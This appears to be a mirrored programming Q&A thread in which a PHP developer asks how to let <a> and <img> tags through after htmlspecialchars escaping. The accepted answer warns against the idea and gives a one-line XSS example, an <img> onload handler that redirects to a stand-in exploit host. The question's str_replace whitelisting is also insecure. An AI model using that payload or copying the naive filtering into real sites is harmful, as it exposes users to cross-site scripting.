dsgw8802 2017-04-14 15:40
浏览 73
已采纳

htmlentities允许<a>链接 - 如何?

In order to make my inputs safe, I'm using htmlentities in php:

$input = $_POST['field'];
$result = htmlspecialchars($input);

This works, but then I realized that in some inputs, I need to allow some basic markup like <b> and <i>, copyright logos and basic stuff for the user. So I started doing this:

$result = $_POST['ftext'];
$presanitize = htmlspecialchars($result);
$newftext = str_replace(array("&lt;i&gt;", "&lt;b&gt;", "&lt;/i&gt;", "&lt;/b&gt;", "&copy;", "&quot;", "&lt;a&gt;", "&lt;&#47;a&gt;"), 
array("<i>", "<b>", "</i>", "</b>", "©", '"', "<a>", "</a>"), $presanitize);

Now we come to my main problem: how to allow things like <a> and <img> where we don't have only a tag and don't know what comes inside of it?

I can replace , because it's always only , but if I replace , it wont work as I'll have lots of stuff (<a href="http://link.com">Text</a>) inside of it. What should I do? Thanks in advance.

  • 写回答

2条回答 默认 最新

  • dsft8327 2017-04-14 15:52
    关注

    The simple answer is: You don't. That's part of the reason why many popular forum systems use some kind of markup that's not just plain HTML. Otherwise people can and will do nasty stuff some way or another.

    <img src="http://example.com/random-pic.jpg" onload="location.href='http://some.nasty.page/exploit';"/>

    But you can remove event tags? Of course, but will you keep up to date with everything browsers support and their quirks? Can you really outsmart everyone?

    If you still want to do it, look for a well documented, tested, and used library or script that provides this functionality. PHP essentially has this built in, but it's really barebone. Some keywords to look for would be "php html sanitizer" or similar.

    Personally I'd recommend you just support Markdown or BBCode like syntax (again: there are many ready to use snippets and libraries available). Don't reinvent the wheel unless you really have to.

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(1条)

报告相同问题?

悬赏问题

  • ¥15 js,页面2返回页面1时定位进入的设备
  • ¥50 导入文件到网吧的电脑并且在重启之后不会被恢复
  • ¥15 (希望可以解决问题)ma和mb文件无法正常打开,打开后是空白,但是有正常内存占用,但可以在打开Maya应用程序后打开场景ma和mb格式。
  • ¥15 绘制多分类任务的roc曲线时只画出了一类的roc,其它的auc显示为nan
  • ¥20 ML307A在使用AT命令连接EMQX平台的MQTT时被拒绝
  • ¥20 腾讯企业邮箱邮件可以恢复么
  • ¥15 有人知道怎么将自己的迁移策略布到edgecloudsim上使用吗?
  • ¥15 错误 LNK2001 无法解析的外部符号
  • ¥50 安装pyaudiokits失败
  • ¥15 计组这些题应该咋做呀